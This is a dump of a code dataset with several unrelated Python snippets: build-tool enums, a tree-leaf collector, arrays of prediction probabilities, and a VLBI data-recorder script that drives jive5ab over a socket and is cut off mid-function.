index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
8,000 | 5e86e97281b9d18a06efc62b20f5399611e3510d | from enum import Enum
# Symbolic names of build-tool exit statuses.
# NOTE(review): names match Bazel/Blaze exit-code identifiers and the list
# position presumably mirrors their numeric codes — confirm before indexing.
EXIT_CODES = [
    "SUCCESS",
    "BUILD_FAILURE",
    "PARSING_FAILURE",
    "COMMAND_LINE_ERROR",
    "TESTS_FAILED",
    "PARTIAL_ANALYSIS_FAILURE",
    "NO_TESTS_FOUND",
    "RUN_FAILURE",
    "ANALYSIS_FAILURE",
    "INTERRUPTED",
    "LOCK_HELD_NOBLOCK_FOR_LOCK",
    "REMOTE_ENVIRONMENTAL_ERROR",
    "OOM_ERROR",
    "REMOTE_ERROR",
    "LOCAL_ENVIRONMENT_ERROR",
    "BLAZE_INTERNAL_ERROR",
    "PUBLISH_ERROR",
    "PERSISTENT_BUILD_EVENT_SERVICE_UPLOAD_ERROR"
]
class DistantEnum(Enum):
    """Enum base whose string form is the member's underlying value."""

    def __str__(self) -> str:
        # Render as e.g. "k8" instead of the default "CPU.k8".
        return str(self.value)
class CPU(DistantEnum):
    """Target CPU identifiers; each value is the literal flag spelling."""
    k8 = "k8"
    piii = "piii"
    darwin = "darwin"
    freebsd = "freebsd"
    # Member name differs from its value: "armeabi" maps to "armeabi-v7a".
    armeabi = "armeabi-v7a"
    arm = "arm"
    aarch64 = "aarch64"
    x64_windows = "x64_windows"
    x64_windows_msvc = "x64_windows_msvc"
    s390x = "s390x"
    ppc = "ppc"
    ppc64 = "ppc64"
class CompilationMode(DistantEnum):
    """Build compilation modes (names and values are identical strings)."""
    fastbuild = "fastbuild"
    dbg = "dbg"
    opt = "opt"
|
8,001 | 603cce951dd0f78ef3ca9dce587042b3b7f6b449 | """
You are given a tree-like data structure represented as nested dictionaries.
Implement a function collect_leaves that accepts a tree and returns a list of all its leaves. A leaf is a bottom-most node in a tree.
Implement simple unit tests via the assert statement.
"""
from typing import Union
def collect_leaves(u: Union[dict, list]) -> list:
    """Return a flat list of all leaves of a nested-dict tree.

    Dict values are recursed into; anything that is not a dict is the
    bottom-most node's payload (a list of values) and is returned as-is.
    """
    if not isinstance(u, dict):
        # Reached a leaf node: its payload is already the list of leaves.
        return u
    leaves = []
    for subtree in u.values():
        leaves.extend(collect_leaves(subtree))
    return leaves
# Sample fixture: inner nodes are dicts, leaves are lists of ints.
tree = {
    "node1": {
        "node11": {
            "node111": [1, 2, 3],
            "node112": [4, 5]
        },
        "node12": [6]
    },
    "node2": [7, 8, 9]
}
# Lightweight unit tests, as requested by the exercise statement.
assert collect_leaves([1, 2, 3]) == [1, 2, 3]
assert collect_leaves(tree) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
|
8,002 | 593d3221e34c0eef51228082d767d8516ec93ca2 |
y_true = [7, 3,
3,
4,
9,
9,
2,
5,
0,
0,
6,
3,
1,
6,
8,
7,
9,
7,
4,
2,
0,
1,
4,
1,
7,
7,
5,
0,
8,
0,
1,
7,
4,
2,
2,
4,
9,
3,
1,
7,
1,
2,
1,
7,
5,
9,
9,
4,
8,
5,
7,
2,
7,
5,
5,
6,
6,
1,
2,
6,
6,
5,
3,
2,
3,
8,
8,
8,
8,
5,
3,
4,
3,
2,
8,
1,
9,
0,
6,
8,
6,
1,
1,
1,
5,
4,
8,
8,
5,
5,
8,
6,
4,
4,
6,
9,
8,
1,
5,
5]
y_pred_prob = [
[0.0597563199698925,
0.1344364434480667,
0.1173347756266594,
0.11292721331119537,
0.10652001202106476,
0.13155865669250488,
0.10057594627141953,
0.10029518604278564,
0.10313529521226883,
0.03346000984311104],
[0.0002930850023403764,
0.23393571376800537,
0.09061524271965027,
0.21862193942070007,
0.04659481346607208,
0.04461496323347092,
0.0952368974685669,
0.2075100988149643,
0.0616493821144104,
0.0009278177167288959],
[0.22330643236637115,
1.0582012919257977e-06,
0.22777651250362396,
0.20880192518234253,
9.877869615593227e-07,
0.0006437229458242655,
0.1556401550769806,
7.201562368663872e-08,
0.18382851779460907,
5.064675860921852e-07],
[1.7682419638731517e-05,
0.001197152421809733,
0.015430454164743423,
0.0037515582516789436,
0.32882484793663025,
0.0003495111595839262,
0.012810198590159416,
0.054448556154966354,
0.30387693643569946,
0.27929291129112244],
[0.16070464253425598,
4.810986276027052e-09,
0.15206283330917358,
0.004463076591491699,
0.1652054488658905,
0.0038724008481949568,
0.17216043174266815,
0.13407163321971893,
0.029512932524085045,
0.17794682085514069],
[0.10922636836767197,
2.2864300319724862e-07,
0.11546860635280609,
0.001813476555980742,
0.1788507103919983,
0.005888130981475115,
0.18413811922073364,
0.10866158455610275,
0.10712066292762756,
0.18883220851421356],
[0.005557563621550798,
0.0001692363148322329,
0.35343053936958313,
0.0015008420450612903,
0.00037875055568292737,
0.2150292843580246,
0.014169459231197834,
0.03244209289550781,
0.33539846539497375,
0.041923996061086655],
[0.193454310297966,
3.662989183794707e-05,
0.10065275430679321,
0.00039752188604325056,
0.16119857132434845,
0.19390884041786194,
0.07022294402122498,
0.02460072562098503,
0.16083283722400665,
0.0946948304772377],
[0.28058794140815735,
1.1208027217435301e-06,
0.018203848972916603,
0.16030532121658325,
0.00018859952979255468,
0.21325571835041046,
0.2328961044549942,
0.007604319602251053,
0.04473938047885895,
0.04221738502383232],
[0.1718112975358963,
7.514636672567576e-05,
0.15386143326759338,
0.008414546959102154,
0.001738831982947886,
0.15720322728157043,
0.17100712656974792,
0.15586316585540771,
0.104509636759758,
0.07551562041044235],
[0.001471314812079072,
0.008587654680013657,
0.0367623046040535,
0.011750160716474056,
0.07068527489900589,
0.4173307418823242,
0.12449752539396286,
0.014547907747328281,
0.2990296185016632,
0.01533727627247572],
[0.005052714608609676,
0.0073812128975987434,
0.009834956377744675,
0.33292853832244873,
0.0018518454162403941,
0.0015299966325983405,
0.002040529390797019,
0.3055168688297272,
0.32741934061050415,
0.006443792954087257],
[0.0011697597801685333,
0.20749542117118835,
0.07009387016296387,
0.08994801342487335,
0.09965154528617859,
0.060963381081819534,
0.13158728182315826,
0.1365581601858139,
0.11990636587142944,
0.08262615650892258],
[0.020798824727535248,
1.469431822442857e-06,
0.016172533854842186,
0.021048342809081078,
0.009139545261859894,
0.3956705331802368,
0.3814408779144287,
7.980810551089235e-06,
0.1391601711511612,
0.016559595242142677],
[0.0008747534011490643,
0.0009511907119303942,
0.055323366075754166,
0.05426914989948273,
0.03363798186182976,
0.12827005982398987,
0.03197509050369263,
0.0008451330941170454,
0.37859639525413513,
0.3152569532394409],
[0.001832291018217802,
9.253426833311096e-05,
0.27192848920822144,
0.18078717589378357,
0.004130060318857431,
0.00929891224950552,
0.1695500910282135,
0.29965919256210327,
0.020460698753595352,
0.042260222136974335],
[0.15259969234466553,
0.00015921871818136424,
0.16849327087402344,
0.002068838570266962,
0.17735524475574493,
0.02342645265161991,
0.18245863914489746,
0.00010533139720791951,
0.11123484373092651,
0.1820984184741974],
[0.18936939537525177,
1.7293215250901994e-06,
0.029253976419568062,
0.1424887329339981,
0.01099975686520338,
0.0074686696752905846,
0.053486552089452744,
0.2111600935459137,
0.14551354944705963,
0.21025745570659637],
[3.861714503727853e-05,
0.1669524759054184,
0.00032175786327570677,
0.15850232541561127,
0.1955566704273224,
0.012984608300030231,
0.14730143547058105,
0.066555455327034,
0.1175893247127533,
0.13419757783412933],
[0.1504199206829071,
0.006808706559240818,
0.22468900680541992,
0.18946652114391327,
1.2391226846375503e-05,
0.10332755744457245,
0.15032899379730225,
2.30663204092707e-06,
0.17487214505672455,
7.243863365147263e-05],
[0.23918452858924866,
5.279692683046733e-09,
0.0671931579709053,
0.2041931003332138,
9.380520350532606e-05,
0.18892300128936768,
0.16166524589061737,
1.2340686907919007e-06,
0.1280936300754547,
0.010652361437678337],
[0.0019602354150265455,
0.17319674789905548,
0.16884981095790863,
0.025876348838210106,
0.11373495310544968,
0.034116633236408234,
0.09377618134021759,
0.16857513785362244,
0.10720878094434738,
0.11270517110824585],
[0.006008224096149206,
7.275425741681829e-05,
0.002679133554920554,
0.005456522107124329,
0.2852444648742676,
0.007294526789337397,
0.26774612069129944,
0.0033797386568039656,
0.15357472002506256,
0.26854372024536133],
[0.0020487161818891764,
0.18302913010120392,
0.17970730364322662,
0.03157859668135643,
0.10424197465181351,
0.028137331828475,
0.049388039857149124,
0.17323219776153564,
0.13171784579753876,
0.11691895872354507],
[0.011249794624745846,
0.0003711018362082541,
0.32693105936050415,
0.0010822461917996407,
0.0076926033943891525,
0.04566335678100586,
0.005700047593563795,
0.32916736602783203,
0.09476791322231293,
0.17737449705600739],
[0.0001925578253576532,
7.067231763357995e-06,
0.0001896199828479439,
0.09954455494880676,
0.23005598783493042,
0.2152310460805893,
0.09002267569303513,
0.017976609990000725,
0.0920918807387352,
0.25468799471855164],
[0.0006383731961250305,
3.095208057857235e-06,
0.0005969868507236242,
0.41469672322273254,
0.0053739529103040695,
0.40698617696762085,
0.08218759298324585,
0.0003528161614667624,
0.07473969459533691,
0.014424380846321583],
[0.19537049531936646,
3.243912300235352e-13,
0.005169959273189306,
0.17694340646266937,
2.949438930954784e-05,
0.1400780826807022,
0.18864554166793823,
3.857006959151477e-06,
0.18823771178722382,
0.10552132874727249],
[0.009722508490085602,
3.8531984500878025e-06,
0.07383214682340622,
0.03598225489258766,
0.07267675548791885,
0.1459459662437439,
0.07249364256858826,
0.002293274737894535,
0.48588359355926514,
0.1011660099029541],
[0.21651780605316162,
9.559274261050632e-09,
0.14371894299983978,
0.13431811332702637,
2.7394575226935558e-05,
0.1838626116514206,
0.17265450954437256,
0.00012304158008191735,
0.12219242751598358,
0.0265849307179451],
[4.430914850672707e-05,
0.2043066918849945,
0.0002825123374350369,
0.16263452172279358,
0.1939067542552948,
0.1427866667509079,
0.11921370774507523,
0.0028419536538422108,
0.06556723266839981,
0.10841585695743561],
[0.004471424967050552,
0.1858968585729599,
0.17653658986091614,
0.01416453905403614,
0.008144107647240162,
0.0843614935874939,
0.05890577659010887,
0.18505530059337616,
0.10232891887426376,
0.18013498187065125],
[0.00041712025995366275,
1.1021310228898074e-06,
0.08412905037403107,
0.0002837374631781131,
0.2740859091281891,
0.013903344981372356,
0.08929961919784546,
0.2733091115951538,
0.2233879268169403,
0.04118315503001213],
[0.04552318528294563,
0.020853176712989807,
0.26410210132598877,
0.23437173664569855,
2.1701146124541992e-06,
0.10220374912023544,
0.07447297871112823,
7.592303154524416e-05,
0.25814488530158997,
0.00025002588517963886],
[0.024719374254345894,
0.00217414740473032,
0.26734668016433716,
0.17261573672294617,
0.003498602891340852,
0.05698162689805031,
0.2737174332141876,
8.039058593567461e-05,
0.19880186021327972,
6.410985952243209e-05],
[0.12234598398208618,
6.703280632791575e-06,
0.015603234991431236,
0.013786871917545795,
0.21616478264331818,
0.005412149243056774,
0.11406012624502182,
0.12291428446769714,
0.18262456357479095,
0.20708128809928894],
[0.193313866853714,
6.033819488493464e-08,
0.14491458237171173,
0.2349807769060135,
0.0006736826617270708,
0.003743150969967246,
0.12457092851400375,
0.004962997976690531,
0.23268520832061768,
0.060154590755701065],
[0.006641837302595377,
0.005113706924021244,
0.060135774314403534,
0.37294134497642517,
0.0001917753543239087,
0.35536521673202515,
0.003515040036290884,
0.00014136293611954898,
0.19584619998931885,
0.00010780058073578402],
[0.00022568553686141968,
0.1758676916360855,
0.08169379830360413,
0.11927571147680283,
0.14987629652023315,
0.026822827756404877,
0.09613550454378128,
0.14441852271556854,
0.11029191315174103,
0.09539227187633514],
[0.028152454644441605,
0.04798303544521332,
0.06989692151546478,
0.07051544636487961,
0.07356826215982437,
0.05468234792351723,
0.11397064477205276,
0.2294078767299652,
0.0822836384177208,
0.22953952848911285],
[0.0009083361364901066,
0.16873282194137573,
0.040142301470041275,
0.13509070873260498,
0.16045929491519928,
0.09148524701595306,
0.0939648225903511,
0.13889746367931366,
0.043392572551965714,
0.12692658603191376],
[7.008769898675382e-05,
0.0012455701362341642,
0.4437786936759949,
0.03154001384973526,
0.0033613061532378197,
0.0024434190709143877,
0.3866567313671112,
0.0005211094976402819,
0.13020911812782288,
0.00017409549036528915],
[0.00034864526242017746,
0.21021592617034912,
0.005514794960618019,
0.11704950034618378,
0.08421261608600616,
0.13176649808883667,
0.11882488429546356,
0.008054501377046108,
0.1467529684305191,
0.1772596538066864],
[0.036879003047943115,
0.0014911789912730455,
0.2685071527957916,
0.0029583016876131296,
0.011879128403961658,
0.030892902985215187,
0.08989892154932022,
0.29645001888275146,
0.04054954648017883,
0.2204938679933548],
[0.0064177061431109905,
0.0045189931988716125,
0.013788403943181038,
0.18153700232505798,
0.0003662402159534395,
0.5257023572921753,
0.06426692008972168,
9.742573638504837e-06,
0.2026320844888687,
0.000760772149078548],
[0.0017538872780278325,
0.0002046643348876387,
0.04638877511024475,
0.11219469457864761,
0.1732793003320694,
0.000888414157088846,
0.1527005136013031,
0.171849325299263,
0.16653017699718475,
0.17421048879623413],
[6.957617006264627e-05,
3.015168840647675e-05,
0.05601977929472923,
0.06104991212487221,
0.14622464776039124,
0.0013683908618986607,
0.004713970702141523,
0.26153290271759033,
0.21816983819007874,
0.25082090497016907],
[0.001964711584150791,
0.14094221591949463,
0.04670453444123268,
0.11537310481071472,
0.1456061750650406,
0.021807175129652023,
0.1023702397942543,
0.14592182636260986,
0.1320936679840088,
0.14721626043319702],
[0.0013557883212342858,
5.542307803807489e-07,
0.015518834814429283,
0.020929962396621704,
0.12795883417129517,
0.012969551607966423,
0.011510342359542847,
0.3424086570739746,
0.3332746922969818,
0.1340728998184204],
[0.0951327458024025,
0.03636496141552925,
0.018829435110092163,
0.060135968029499054,
0.1569897085428238,
0.1514764130115509,
0.13258931040763855,
0.1450430303812027,
0.04603665694594383,
0.15740196406841278],
[0.17052830755710602,
1.5615187294315547e-06,
0.0013229812029749155,
0.12005076557397842,
0.021564221009612083,
0.024421295151114464,
0.17088675498962402,
0.15222683548927307,
0.1693890392780304,
0.16960804164409637],
[0.006946968380361795,
0.3011370897293091,
0.3187958002090454,
0.06604688614606857,
0.011190904304385185,
0.05437859520316124,
0.020502492785453796,
0.010224146768450737,
0.21062366664409637,
0.00015340560639742762],
[0.003341993084177375,
0.0016007163794711232,
0.0007675797096453607,
0.18986503779888153,
0.1190534457564354,
0.02811228297650814,
0.09639428555965424,
0.21583504974842072,
0.13505271077156067,
0.2099769562482834],
[0.042331017553806305,
0.00029962626285851,
0.0023094473872333765,
0.18676534295082092,
0.000317152967909351,
0.48982951045036316,
0.1871659755706787,
8.205944141082e-06,
0.09039845317602158,
0.0005752819124609232],
[0.27066469192504883,
0.0001488085399614647,
0.025224560871720314,
0.03236522525548935,
0.00022321399592328817,
0.3199988305568695,
0.20726615190505981,
2.1540354282478802e-05,
0.13308577239513397,
0.011001424863934517],
[0.21046556532382965,
8.32586906085453e-08,
0.050842639058828354,
0.0012313498882576823,
0.17998859286308289,
0.005802170839160681,
0.22032563388347626,
9.771327313501388e-06,
0.2085702270269394,
0.12276387959718704],
[0.278763085603714,
2.956639932882865e-10,
0.2363770455121994,
0.0021949675865471363,
0.024400619789958,
0.01081052329391241,
0.2788945734500885,
0.000592902593780309,
0.09800171107053757,
0.06996453553438187],
[0.0012440741993486881,
0.0002501744020264596,
0.039189230650663376,
0.003109667217358947,
0.1353403925895691,
0.17648975551128387,
0.29823172092437744,
0.0005026640137657523,
0.1873668134212494,
0.15827545523643494],
[4.636057929019444e-05,
0.004471238702535629,
0.010865537449717522,
0.03406133875250816,
0.2391168773174286,
0.0102084307000041,
0.24508318305015564,
0.10957624763250351,
0.10304577648639679,
0.24352511763572693],
[0.007771539501845837,
0.003819737583398819,
0.05605701357126236,
0.0013185413554310799,
0.026425426825881004,
0.37273845076560974,
0.39364394545555115,
3.468452996457927e-05,
0.13644644618034363,
0.0017443000106140971],
[0.0042862421832978725,
4.118454022261631e-09,
0.24541069567203522,
1.311416235694196e-05,
0.002639196580275893,
0.2002275139093399,
0.35612747073173523,
8.159701246768236e-05,
0.11912810802459717,
0.07208611816167831],
[0.10790199786424637,
0.00018712706514634192,
0.001723292050883174,
0.3369658291339874,
0.005216643214225769,
0.323357492685318,
0.04629630222916603,
0.0006358266109600663,
0.17700347304344177,
0.0007120332447811961],
[0.01004449650645256,
0.0038342783227562904,
0.0029477709904313087,
0.39860454201698303,
0.000900272571016103,
0.32782217860221863,
0.010686549358069897,
0.0006012170924805105,
0.23407192528247833,
0.010486727580428123],
[0.0015078516444191337,
0.23596949875354767,
0.4038705825805664,
0.04463784024119377,
0.00036313795135356486,
0.005906661506742239,
0.012559221126139164,
0.010579549707472324,
0.2843676507472992,
0.0002381248341407627],
[0.1887362003326416,
0.0019065006636083126,
0.2840288579463959,
0.2984219193458557,
4.9067231884691864e-05,
0.1615515947341919,
0.012938770465552807,
0.00029289082158356905,
0.052058152854442596,
1.6269357729470357e-05],
[0.0006827416946180165,
2.276465056638699e-05,
0.023704057559370995,
0.16121432185173035,
0.0033186341170221567,
0.004117893520742655,
0.03627816215157509,
0.009822812862694263,
0.7281517386436462,
0.032687313854694366],
[0.0011369712883606553,
0.27387163043022156,
0.07185991108417511,
0.15628814697265625,
0.002854800783097744,
0.23154565691947937,
0.03204796463251114,
0.003870188258588314,
0.22623319923877716,
0.00029159500263631344],
[0.0035695999395102262,
0.26706114411354065,
0.1508740484714508,
0.0013921442441642284,
0.019328434020280838,
0.13771453499794006,
0.029891734942793846,
0.03509771451354027,
0.24692872166633606,
0.1081417053937912],
[0.000882012362126261,
2.536918327677995e-05,
0.0450599268078804,
0.412322998046875,
0.0025211411993950605,
0.002278776839375496,
0.011372447945177555,
0.1770726591348648,
0.33388030529022217,
0.014584112912416458],
[0.21903501451015472,
5.910552047794226e-09,
0.022012481465935707,
0.20099963247776031,
1.0874355211853981e-05,
0.21909210085868835,
0.21668335795402527,
4.337367798257219e-08,
0.12212178856134415,
4.4732783862855285e-05],
[0.014651631936430931,
0.00830799899995327,
0.005935078486800194,
0.3953670263290405,
1.1293817806290463e-05,
0.4299878776073456,
0.017106691375374794,
0.00014334742445498705,
0.11808823049068451,
0.010400976054370403],
[0.010301091708242893,
0.01435689628124237,
0.07430031895637512,
0.06989920139312744,
0.2338510900735855,
0.053795550018548965,
0.22257547080516815,
0.0029012206941843033,
0.09203658252954483,
0.22598253190517426],
[0.033016644418239594,
0.0020125852897763252,
0.06661045551300049,
0.4920836091041565,
0.00025867935619316995,
0.07482428848743439,
0.13923810422420502,
0.00012527030776254833,
0.19180776178836823,
2.269313517899718e-05],
[0.1325867474079132,
0.004940022714436054,
0.22300080955028534,
0.2727201282978058,
3.310650572529994e-05,
0.12915031611919403,
0.01339033618569374,
1.0927167750196531e-05,
0.22410929203033447,
5.8520683523966e-05],
[0.126132994890213,
0.0013935434399172664,
0.17098797857761383,
0.00039779843064025044,
0.07732491940259933,
0.16493096947669983,
0.014501826837658882,
0.03405503183603287,
0.20594964921474457,
0.2043251097202301],
[0.0008475463255308568,
0.19114449620246887,
0.03174148499965668,
0.1596948355436325,
0.1830475926399231,
0.11398201435804367,
0.11080365628004074,
0.10536272078752518,
0.05745834857225418,
0.04591764137148857],
[0.0009525367058813572,
0.0012388192117214203,
0.0006522738258354366,
0.15977761149406433,
0.2019728273153305,
0.037797972559928894,
0.19880010187625885,
0.008799873292446136,
0.18693988025188446,
0.20306788384914398],
[0.21417981386184692,
1.8215121144748991e-07,
0.11546390503644943,
0.10518436878919601,
5.3784842748427764e-05,
0.17964830994606018,
0.1753360480070114,
0.005312803667038679,
0.07569659501314163,
0.1291242241859436],
[0.03322113677859306,
1.1228289409359604e-08,
0.11529551446437836,
0.006697801407426596,
0.020004654303193092,
0.2904326617717743,
0.3397071361541748,
6.173769179440569e-06,
0.1187906265258789,
0.07584403455257416],
[0.00018722846289165318,
0.00015633362636435777,
0.027305739000439644,
0.30433472990989685,
0.12216899544000626,
0.0051543135195970535,
0.07717369496822357,
5.6467473768861964e-05,
0.46220865845680237,
0.0012535307323560119],
[0.2223890870809555,
1.8010264568601997e-07,
0.051188305020332336,
0.06915734708309174,
0.007792292162775993,
0.13037307560443878,
0.4795873761177063,
6.65841726004146e-05,
0.03377178683876991,
0.0056741489097476006],
[0.0011432061437517405,
0.172257199883461,
0.08959532529115677,
0.09976792335510254,
0.13487820327281952,
0.025573352351784706,
0.11224105209112167,
0.1427890509366989,
0.12529729306697845,
0.09645748883485794],
[0.00039081714930944145,
0.17529502511024475,
0.07816692441701889,
0.12808731198310852,
0.13959045708179474,
0.04451143741607666,
0.07863735407590866,
0.1518080085515976,
0.09225541353225708,
0.11125729233026505],
[0.0005360758514143527,
0.1871286779642105,
0.09343081712722778,
0.10187795013189316,
0.15403643250465393,
0.03745483607053757,
0.10108820348978043,
0.1381213515996933,
0.1196260005235672,
0.0666997954249382],
[0.02377643622457981,
0.002874232828617096,
0.06835681945085526,
0.08628982305526733,
0.16734763979911804,
0.1884264051914215,
0.06887176632881165,
0.1883554309606552,
0.11966855823993683,
0.0860329195857048],
[0.0019290593918412924,
0.0004132240719627589,
0.08087942749261856,
0.00133050128351897,
0.2057691514492035,
0.014698517508804798,
0.10668473690748215,
0.2002524882555008,
0.19643288850784302,
0.19160999357700348],
[4.1589693864807487e-05,
3.0074079404585063e-06,
0.00946643017232418,
0.0028675245121121407,
0.339987188577652,
0.006530506536364555,
0.21062259376049042,
5.006019819120411e-06,
0.4303286373615265,
0.00014742799976374954],
[0.23467645049095154,
3.957170217048535e-14,
0.016559595242142677,
0.22702592611312866,
0.0004185910802334547,
0.0031147561967372894,
0.2260916531085968,
2.4497327899553056e-07,
0.2333890199661255,
0.05872354656457901],
[0.1723964959383011,
1.4810979109824984e-07,
0.001400468056090176,
0.3012116253376007,
0.00017689657397568226,
0.29611334204673767,
0.013564502820372581,
0.04992862418293953,
0.15185707807540894,
0.013350787572562695],
[0.18757264316082,
1.502647393181178e-07,
0.0013043361250311136,
0.08373606950044632,
0.0005724140792153776,
0.1799388974905014,
0.14538954198360443,
0.16594813764095306,
0.06483398377895355,
0.17070381343364716],
[0.008307700976729393,
0.0005032537155784667,
0.04173918813467026,
0.055757056921720505,
0.2954571545124054,
0.046274807304143906,
0.15145555138587952,
0.00160416669677943,
0.36763912439346313,
0.031262170523405075],
[0.03202534094452858,
2.929154447883775e-07,
0.03331722691655159,
0.0002443870762363076,
0.021324075758457184,
0.3864181637763977,
0.39420267939567566,
3.2187076612899546e-06,
0.08215467631816864,
0.050310224294662476],
[0.03041147254407406,
3.317395247393051e-10,
0.013215649873018265,
0.009000282734632492,
0.15260590612888336,
9.569835674483329e-05,
0.22718068957328796,
0.0983223170042038,
0.23328886926174164,
0.23587895929813385],
[0.0017376767937093973,
0.01800091378390789,
0.09461784362792969,
0.008886604569852352,
0.23299837112426758,
0.03532419353723526,
0.20058980584144592,
0.1702878624200821,
0.06943482160568237,
0.1681220531463623],
[0.26592451333999634,
1.378083283043452e-07,
0.26663097739219666,
0.00043869472574442625,
0.0753256231546402,
0.000345755455782637,
0.2718716561794281,
0.09590824693441391,
0.021168876439332962,
0.0023856020998209715],
[0.007719929795712233,
0.000273746729362756,
0.06954099237918854,
0.11292484402656555,
0.17693056166172028,
0.0036023242864757776,
0.16335690021514893,
0.1139131560921669,
0.17289915680885315,
0.17883846163749695],
[0.0002722161589190364,
0.0014734293799847364,
0.0001780118327587843,
0.0718056932091713,
0.219150573015213,
0.02937471494078636,
0.15243956446647644,
0.07647080719470978,
0.21917390823364258,
0.22966115176677704],
[0.0008591399528086185,
0.27216723561286926,
0.030793067067861557,
0.040201541036367416,
0.07587726414203644,
0.06215333193540573,
0.16188929975032806,
0.04154059290885925,
0.21999017894268036,
0.09452840685844421],
[0.156771719455719,
0.0009459690772928298,
0.08676373958587646,
0.012071664445102215,
0.046294376254081726,
0.1705559939146042,
0.05631829798221588,
0.16554586589336395,
0.14995504915714264,
0.15477733314037323],
[0.0036007703747600317,
0.0036146841011941433,
0.007429149001836777,
0.10190737992525101,
0.0016259902622550726,
0.45585712790489197,
0.04189519211649895,
7.317630092984473e-07,
0.3802386522293091,
0.003830441040918231]]
|
8,003 | f218f47acfb078877645de26c64e57f92dbcd953 | import utilities
import sys
# Demonstrate the run-directly vs. imported distinction.
if __name__ == "__main__":
    print('I am main!')
else:
    print(__name__)
# Print 0..5 (range end is exclusive).
for i in range(0,6):
    print(i)
mylist = [12, 13, 14, 13, 12]
print(mylist)
#Enter iterations to run [0-5]
#value = -1
value = 3  # pre-set to a valid value, so the interactive loop below is skipped
while (value not in range(0,6)):
    try:
        value = int(input('Enter #test runs [0-5]:'))
    except ValueError:
        # Non-numeric input: re-prompt instead of crashing.
        print('Invalid value entered, retry')
print('Final value entered {}'.format(value))
dir(sys)  # NOTE(review): result is discarded — likely exploratory leftover
print('done!')
# Invoke the project-local helpers once per list element.
for i in mylist:
    utilities.myfct(i, 'hi')
    utilities.myfct1(i)
|
8,004 | 25ee13314c7cf828b8805d9f483bd5ee12073228 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .BLWecc import (
curve,
setCurve,
getPublicKey,
getPrivateKey,
getAddress as getAddressByCode,
pub2add as getAddressByPublicKey,
sign,
verifyTx as verify,
)
|
8,005 | 46f3d3681343d96889ddb073f17ff7f225486f35 | my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]
# Drop zeros first so the divisions below cannot fail for this data.
new_list = list(filter(lambda x: x != 0, my_list))
# Initialize `new` up front: previously, if the except path ever ran,
# `new` would be undefined and print(new) would raise NameError.
new = []
try:
    new = list(map(lambda x: 2 / x, new_list))
except ZeroDivisionError:
    # Best-effort: leave `new` as the (possibly empty) fallback value.
    pass
print(new)
# def devis(n, list):
# new_list = []
# for i, m_list in enumerate(list):
# try:
# new_list.append(n/m_list)
# except ZeroDivisionError:
# new_list.append(None)
# return new_list
# print(devis(2, my_list))
|
8,006 | 8eb08fa497ccf3ddc8f4d2b886c9e5a9bdb2e052 | #!/usr/bin/python
import socket, os, datetime, time, re, sys
import numpy as np
import matplotlib.pyplot as plt
from baseband import vdif
import astropy.units as u
from scipy.signal import resample_poly
import matplotlib.patches as patches
def fbcmd(message):
    """Send one control command to the jive5ab server and return its reply.

    Connects to the module-level ``ip``/``port`` endpoint for each call and
    prints the traffic when ``DEBUG`` is set.  The reply is read as a single
    recv of up to 1024 bytes — assumed sufficient for jive5ab responses
    (TODO confirm).
    """
    # `with` guarantees the socket is closed even if connect/send raises;
    # the original leaked the file descriptor on any exception before close().
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        # sendall: plain send() may transmit only part of the message.
        sock.sendall(message.encode())  # convert message to bytestring
        if DEBUG:
            print('INFO: sent to '+ip+':'+port + ':' + message)
        data = sock.recv(1024)
        if DEBUG:
            print('INFO: answer: ', data.decode())
    return data.decode()
def get_singlefile_data(vbsname):
    """Extract a short data chunk from a single-file recording via vmux.

    Returns ``[found, nbbcs, ifdata, start_time]``; ``found`` is False when
    the scan name does not exist on the recorder.  Relies on module globals
    (scriptdir, extractiontime, sample_rate) and the fbcmd() helper.
    """
    # TODO: Thread/IF selection in vmux step
    disk2fileout = scriptdir+"/checkdata.vdif"
    vmuxedfile = disk2fileout +".vmuxed"
    # Select a window starting 2 s into the scan, `extractiontime` long.
    ss = fbcmd("scan_set="+vbsname+":+2.0s:+"+extractiontime)
    if " does not exist" in ss:
        return [False, -1, 0, -1] # No single file data found
    sc = fbcmd("scan_check?")
    # Field 4 of the scan_check reply is treated as 2x the number of BBCs
    # — NOTE(review): assumed jive5ab reply layout, confirm.
    nbbcs = int(int(sc.split(":")[4])/2)
    fbcmd("disk2file=" + disk2fileout + ":::w")
    nwait = 0
    time.sleep(0.25) # Wait for disk2file
    # Poll until the transfer reports "inactive"; give up after ~5 polls.
    while True:
        stat = fbcmd("disk2file?")
        if "inactive" in stat:
            break
        if nwait>5:
            print("ERROR: Waited more than 5 sec for disk2file! Something is wrong, exiting...")
            sys.exit(1)
        time.sleep(1) # Wait for disk2file
        nwait+=1
    # De-multiplex the 8 VDIF threads into one multi-channel file.
    vmuxcmd = "vmux -v {0} 8224 15625 0,1,2,3,4,5,6,7 {1}".format(disk2fileout, vmuxedfile)
    os.system(vmuxcmd)
    time.sleep(5) # Wait for vmux
    # Read file
    fh = vdif.open(vmuxedfile, 'rs', sample_rate=sample_rate*u.MHz) # Need to specify sample rate, too short to autodetect.
    start_time = fh.info()['start_time']
    # Ensure file pointer is at beginning of file
    fh.seek(0)
    # Read all data until end
    ifdata = fh.read()
    # Close infile
    fh.close()
    return [True, nbbcs, ifdata, start_time]
def get_multifile_data(vbs, nif):
    """Extract a short data chunk of one IF from a multi-file recording.

    Returns ``[nbbcs, ifdata, start_time]``; ``nbbcs`` is -1 when the per-IF
    scan name does not exist.  Relies on module globals (scriptdir,
    extractiontime, sample_rate) and the fbcmd() helper.
    """
    # Multi-file recordings are stored one file per IF, suffixed "_<nif>".
    vbsname = vbs+"_"+str(nif)
    disk2fileout = scriptdir+"/checkdata.vdif"
    # Select a window starting 2 s into the scan, `extractiontime` long.
    ss = fbcmd("scan_set="+vbsname+":+2.0s:+"+extractiontime)
    if " does not exist" in ss:
        return [-1, 0, -1]
    sc = fbcmd("scan_check?")
    # Field 4 of the scan_check reply is treated as 2x the number of BBCs
    # — NOTE(review): assumed jive5ab reply layout, confirm.
    nbbcs = int(int(sc.split(":")[4])/2)
    fbcmd("disk2file=" + disk2fileout + ":::w")
    nwait = 0
    time.sleep(0.25) # Wait for disk2file
    # Poll until the transfer reports "inactive"; give up after ~5 polls.
    while True:
        stat = fbcmd("disk2file?")
        if "inactive" in stat:
            break
